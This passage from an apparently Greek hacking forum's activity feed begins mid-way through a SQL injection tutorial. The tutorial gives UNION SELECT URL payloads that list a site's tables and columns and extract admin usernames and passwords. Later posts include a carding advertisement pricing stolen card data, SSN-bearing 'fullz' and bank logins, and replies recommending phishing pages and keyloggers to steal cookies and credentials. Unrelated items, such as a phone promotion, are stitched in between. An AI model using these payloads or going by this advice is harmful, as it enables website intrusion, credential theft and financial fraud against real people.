les The above URL will display only the first table name which is listed in the database information_schema. So using group_concat() just like in version 4 works with the same principle. Example: www.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from information_schema.tables We should now be able to see all the tables listed on one page, sometimes the last tables will be cut off the end because a portion of the page will be covered in table names from information_schema which aren't useful for us so really, I usually prefer to display table names from the primary database rather than information_schema, we can do the following by using the +where+table_schema=database() command: where => A query for selection table_schema => Schema of tables from a database database() => In context the primary database, just leave it as it is. Example: www.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database() Example List of tables: About, Admin, Affiliates, Access, Customer, Users Now all tables should be displayed from the primary database, take your pick and get ready to extract columns. Obtaining Column Names from Table Names Ok, suggesting from the above we decided to obtain column information from the table Admin. Using information_schema once again but this time we will be using: information_schema.columns instead of information_schema.tables (as we want to extract columns now, not tables) The thing with obtaining column information is similar to the principle of obtaining columns in version 4, except we dont have to guess, once again just one command lists them all when combines with group_concat() Command: Edit the vulnerable column (in this case 2) to: column_name instead of table_name And the end of the URL to: +from+information_schema.columns where table_name=TableNameHEX Example: wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin Now the above will return an error because of the way the command is used at the end of the URL (where table_name=Admin) We must HEX the table name, in this case Admin I use THIS website to for converting Text to Hex. The HEX of Admin is: 41646d696e Now we must add 0x (MySQL integer) at the front of the HEX, which should now look like this: 0x41646d696e And pop it onto the end of the URL replacing Admin, so the URL should look something like the following. Example: www.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table. Say for instance the following columns were displayed: username, password, id, admin_user We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function. Example: www.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin Will display the first username and password data entries from the columns username and password in the table Admin. You can still use group_concat() & limit 0,1 Exactly the same as version 4.
  13. Τηρώντας τις υποσχέσεις της για κορυφαίο σχεδιασμό και ποιότητα κατασκευής σε προσιτή τιμή, η Huawei μας παρουσιάζει τη νέα συσκευή με Full View οθόνη στη mid-range κατηγορία. Το νέο P smart αποδεικνύει πως ένα smartphone με οθόνη που καταλαμβάνει στην πρόσοψή του μεγαλύτερη επιφάνεια σε σχέση με το κανονικό, μπορεί να μας προσφέρει άνετο κράτημα και υπέροχη αίσθηση στην αφή. Με οθόνη 5,65 ιντσών Full View (18:9) που αποτελεί τη νέα τάση για το 2018, FHD+ ανάλυσης και αναλογίας οθόνης/πρόσοψης που ξεπερνά το 80% και κυρτό σχεδιασμό οθόνης 2.5D, προσφέρει μία απολαυστική εμπειρία προβολής. Με τη διπλή κύρια κάμερα 13+2 MP, όλοι μπορούμε να βγάλουμε το φωτογράφο που κρύβουμε μέσα μας και να απολαύσουμε υψηλής ποιότητας λήψεις. Με το Smart Face Beauty ανιχνεύουμε τα μοναδικά χαρακτηριστικά του προσώπου μας και με τις απαραίτητες βελτιώσεις έχουμε selfies που θα κάνουν τη διαφορά στα social media. Και με την έξυπνη λειτουργία ελέγχου μέσω χειρονομίας χωρίς να πατήσουμε κάποιο κουμπί, αιχμαλωτίζουμε τις αγαπημένες μας στιγμές πιο εύκολα από ποτέ. Η εμπρόσθια κάμερα 8MP για εκπληκτικές λήψεις με εφέ bokeh, εστιασμένες στο θέμα της φωτογραφίας και με θολό background ικανοποιούν και με το παραπάνω τις ανάγκες μας. Παράλληλα, ο έλεγχος του P smart γίνεται παιχνίδι χάρη στο λειτουργικό σύστημα EMUI 8.0 που του επιτρέπει να τρέχει γρηγορότερα και ομαλότερα. Διαθέτει τον ισχυρό οκταπύρηνο επεξεργαστή Kirin 659 πλαισιωμένο από 3 GB RAM εκπλήσσοντάς μας με τις δυνατότητες που παρέχει. Και οι εκπλήξεις δεν σταματούν εδώ, καθώς η συσκευή διαθέτει αισθητήρα 4ης γενιάς που αναγνωρίζει το δακτυλικό μας αποτύπωμα μέσα σε 0,3 δευτερόλεπτα. Με μια κίνηση μπορούμε με ασφάλεια να πλοηγούμαστε, να τραβάμε φωτογραφίας ακόμη και να απενεργοποιούμε το ξυπνητήρι. Πόσο ενοχλητικό είναι όταν βλέπουμε ταινία στο smartphone και ξαφνικά διακόπτεται επειδή μας έρχεται μήνυμα; Με τη λειτουργία Split Screen μπορούμε να διαβάζουμε ένα email ή ένα μήνυμα χωρίς να χρειάζεται να κόβουμε στη μέση το βίντεο που βλέπουμε. Παράλληλα, το Huawei P smart μάς προσφέρει εντυπωσιακές εφαρμογές, όπως διαχωρισμό της οθόνης με ένα άγγιγμα, «κλωνοποίηση συσκευής», Huawei Share και διπλή σύνδεση Bluetooth, επιτρέποντάς μας να απολαύσουμε την καθημερινότητά μας χωρίς περιορισμούς. Με δυνατή μπαταρία 3000 mAh και τεχνολογία έξυπνης εξοικονόμησης ενέργειας 6ης γενιάς, δε χρειάζεται να ψάχνουμε πρίζα καθώς η συσκευή αντέχει έως και μια ημέρα χωρίς φόρτιση. Ελαφρύ και λεπτό, το νέο P smart ταιριάζει απόλυτα με την παλάμη μας αποτελώντας ένα πολυπόθητο μεσαίο με δυνατά χαρακτηριστικά. Προβολη του αρθρου
  14. Sell Cvv/Transfer WU/Bank/acc paypal Logins/Track 1&2/Dumps,PIN/All..Country Bank Login + Money transfer + WU Transfer + dumps,dumps+pin legit ccv fullz dumps 101 201 banklogin vendor SELLER OF BANK LOGS AND DUMPS 101 AND 201 FULLZ+PIN PRICE ON DUMPS ::MINIMUM ORDER 3 Country: USA MasterCard Standard, Visa Classic - $30 Visa Gold|Platinum|Corporate|Signature|Business – $70 American Express|Discover|amazon gifts certificates - $40 Country: CANADA MasterCard, Visa Classic - $45 Visa Gold|Platinum|Corporate|Signature|Business – $80 Country:EU 201 MasterCard, Visa Classic - $120 Visa Gold|Platinum|Corporate|Signature|Business – $170 I SELL CCV USA CVV VISA / MASTER $10 AMEX 10$ CVV + DOB + SSN 20.00$ USA FULLZ + PIN 45.00$ CANADA CVV 15$ AND FULLS 30$ UK CVV 16$ EUROPE CVV 18$ FULLZ 35$ REMEMEBER GOOD STUFFS ARE EXPENSIVE AND FRESH COUNTRY AND BANK LOGS :::MINIMUM ON MY BANK TRANSFER 1000$ USA,CA,AU,UK AND EU NEVER SCAM!!! - RULE 1: I NEVER SELL THE SAME CVV to more than a person. - RULE 2: I do not sell CVV to test. - RULE 3: All my CVV always are fresh and live. - RULE 4: ALL MY CVVs ARE CHECKED. - RULE 5: I only replace for dead cc. BANK TRANSFER DEPENDS ON AMOUNT YOU WANT ON LOGIN CONTACT ME : --------------------------- Email : [email protected] icq : 55456789 jabber : [email protected]
  15. Upgrade GPU

    θα συμφωνήσω με τους υπολοίπους πάρε 1050ti αυτή χρησιμοποιώ και εγώ και είμαι ευχαριστημένος.
  16. Ερώτηση cookies steal

    με phising page
  17. Τελευταία Εβδομάδα
  18. Καλος σας βρεικα!

    Καλώς ήρθες φίλε! Εδώ έχουμε πολύ υλικό για διάβασμα. Επίσης οτιδήποτε χρειαστείς μην διστάσεις να ζητήσεις βοήθεια.
  19. Καλος σας βρεικα!

    Καλώς ήρθες λοιπόν
  20. Καλος σας βρεικα!

    Καλος σας βρηκα και εγω, να πω και εγω δυο λογια για μενα με την σειρά μου. Ειμαι Φοιτιτης σε τμημα πληροφορικης 1ο ετος. Ασχολουμε απο πολυ μικρος με Windows και εχω εξοικειωθεί πολυ καλα με αυτα. μου αρεσει κυριος να επισκευαζω τους υπολογιστες απο διαφορα θεματα, Software και hardware, επισης "ψαχνομαι" συνεχεια για καινουρια πραγματα για συντήρηση υπολογιστον και αύξηση απόδοσης. Εχω δουλεψει και σαν τεχνικος και μπορω να πω οτι ηταν ωραια εμπειρια, παρολα αυτα ασχολουμε και με τον προγραμματισμο τους σχολειου, δλδ pascal, C/C++ και αλλα πιο συγκεκριμένα οπως multisim, Matlab και ερχονται κ αλλα με το καιρο. Οσο αφορα το hacking ασχολιομουν πιο παλια κυρίως με bat files και κανα phising. Αλλα θελω να αποκτισω παραπανω γνωσεις, οχι μονο για το hacking αλλα και για να μαθω να προστατεύομαι απο αυτο. Υ.Γ: διάβασα πως τα ορθογραφικά δεν είναι κ πολυ αποδεκτά εδω περα. Κανω αρκετα, αλλα θα προσπαθισω να κανω οσο το λιγοτερα μπορω. Υ.Γ 2 : Επίσης είμαι και Gamer -Γιωργος
  21. Καλώς σας βρήκα όλους.

    Καλησπέρα παιδιά Είμαι και εγώ νέο μέλος στο forum και αρχάριος στο είδος. ξεκίνησα με τους υπολογιστές όταν ήμουν στην γ' δημοτικού με amstrad 128 μετά από λίγα χρόνια με έναν IBM 386 στα 80mb σκληρό δίσκο και dos 5,0 καθώς τότε υπήρχαν τα windows αλλά τα έκανες όλα μέσω εντολών που αργότερα τα ξέχασα σχεδόν όλα γιατί έκανα παύση μερικά χρόνια το 2003 αν θυμάμαι κάλα ξαναπήρα Σταθερό υπολογιστή και από τότε μέχρι και σήμερα ασχολούμαι και αφιερώνω πολύ χρόνο καθημερινά. Μου αρέσει να βρίσκω λύσεις καθημερινά σε φίλους και στον εαυτό μου ψάχνοντας στο διαδίκτυο. επίσης έχω αφιερώσει και πολύ χρόνο στο gaming. τον τελευταίο καιρό έχει μπει ο ψύλλος μέσα μου και έχω αρχίσει να ασχολούμαι με το λογισμικό kali linux όπου βρίσκω διάφορους οδηγούς στο διαδίκτυο και μέχρι τώρα τα πάω καλά καθώς έχουν πετύχει όλα αυτά που έχω κάνει με προγράμματα όπως το fluxion, ettercap, wifi pumpkin και με εντολές στο τερματικό των linux. το έχω εγκαταστήσει σε VM και δεν το τρέχω από usb γιατί θέλω να αποθηκεύονται κάποια αρχεία και προγράμματα που θέλω ίσως το βάλω και στον φορητό με dual boot όμως εκεί γιατί είναι λίγο παλιός και θα σέρνεται με VM πάνω στα Win 10. Πιστεύω ότι ο κάθε άνθρωπος που ενδιαφέρεται να μάθει κάτι το μαθαίνει με κάθε τρόπο. προσπάθεια χρειάζεται. Καλώς σας βρήκα και καλό hacking σε όλους.
  22. Το να διαβασουμε ολα τα βιβλια του κοσμου και να δουμε απειρα βιντεο δεν σημαινει οτι θα γινεται και αστερια!!! Το καθε βιβλιο που γραφετε για χακινγ η οτι διποτε.. αλλο γραφονται για να μεταφερουν την ιδεολογια του: Πως απο το Α φτασαμε στο Χ Μερικοι θα το παρετε σαν ΤΡΙΚ η σαν τεχνικη ... το θεμα δεν ειναι μονο να μαθουμε την τεχνικη αλλα πρεπει να βαλουμε το μυαλο μας να δημιουργησουμε καινουργιες τεχνικες.. η και στην ιδια τεχνικη που μαθαμε να την εμπλουτισουμε... που σημαινει λιωστε σε αυτο που μαθαινετε καντετο 100 φορες και μαθετε για πιο λογο ΓΙΝΕΤΑΙ!! ετσι θα μπορεσετε να φταστετε απο το 0 στο 1000 πολλυ γργ!
  23. Όποιος δε θέλει να ζυμώσει, πέντε μέρες κοσκινίζει.
  24. και για εμένα έχεις απόλυτο δίκιο! παρόλα αυτά εμένα προσωπικά με έχεις βοηθήσει αρκετά!
  25. gcoder είσαι πολύ σωστός και έχεις απόλυτο δίκιο για ο,τι αναφέρεις και μακάρι να συνέβαιναν ΜΟΝΟ στο hackng. Τι εννοώ μόνο στο hacking? Πάρε για παράδειγμα τους μαθητές που προσπαθούν να λύσουν ένα πρόβλημα φυσικής χωρίς να έχουν διαβάσει την θεωρία!
  26. site hacking

    φιλε μονο αμοιβη θα σε παρουν στα σοβαρα αλλα ειναι και μεγαλο ρισκο! οποτε μεγαλη αμοιβη και δελεαστικη!
  27. Ερώτηση cookies steal

    υπαρχει το phishing με pages που μπορεις να δημιουργησεις η εστω και τις ετοιμες! ευκολος απλος τροπος στελνει στο θυμα τα παταει και παιρνεις τα στοιχεια του! (z-shadow,fb sploit klp) εαν ρωτας αυτο γιατι μπορει να καταλαβα λαθος! και με keylogger αλλα ειναι δυσκολο μιας και θελει γνωση metasploit κλπ! ελπιζω να βοηθησα
  28. ναι, ομως πιστευω οτι ειναι οτι πρεπει για scriptkiddies που βαριουντε να κατσουν να διαβασουν παραπανω βιβλια και το μονο που θελουν ειναι να προκαλεσουν ζημια
  1. Load more activity
×